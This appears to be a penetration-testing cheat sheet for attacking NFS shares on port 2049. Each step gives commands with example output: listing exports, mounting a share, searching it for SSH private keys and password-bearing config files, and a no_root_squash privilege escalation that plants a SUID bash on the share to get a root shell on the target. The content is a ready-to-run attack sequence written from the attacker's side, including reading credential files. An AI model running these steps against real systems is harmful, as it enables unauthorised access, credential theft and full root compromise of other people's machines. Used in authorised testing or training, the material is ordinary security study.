NFS (2049)

Show exports

List NFS shares — Find mountable shares

showmount -e $IP
Example Output
showmount -e 10.10.10.5
/home/backup  *(rw,no_root_squash)
/var/www      *(ro)
(no_root_squash = privesc possible)

Mount share

Mount and browse — Full file access

mkdir /tmp/nfs
mount -t nfs $IP:/<share> /tmp/nfs
Example Output
mkdir /tmp/nfs
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
ls /tmp/nfs/
  .ssh/  documents/  notes.txt
(Full access to user's home directory)

Check for SSH keys

Private keys — Instant SSH access

ls -la /tmp/nfs/home/*/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa

cat /home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
(Copy to attacker, chmod 600, ssh -i)

Check for sensitive files

Config files, backups — Passwords in config files

find /tmp/nfs -name '*.conf' -o -name '*.txt' -o -name '*.bak'
Example Output
find /tmp/nfs -name '*.conf' -o -name '*.txt'
/tmp/nfs/notes.txt: 'DB password: MySQLr00t!'
/tmp/nfs/.ssh/id_rsa: -----BEGIN RSA PRIVATE KEY-----

Check permissions / no_root_squash

Privesc via NFS — Write SUID shell, execute on target

If no_root_squash: create SUID binary on share
Example Output
cat /etc/exports shows: no_root_squash

On attacker as root:
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

On target:
/home/backup/rootbash -p
# whoami
root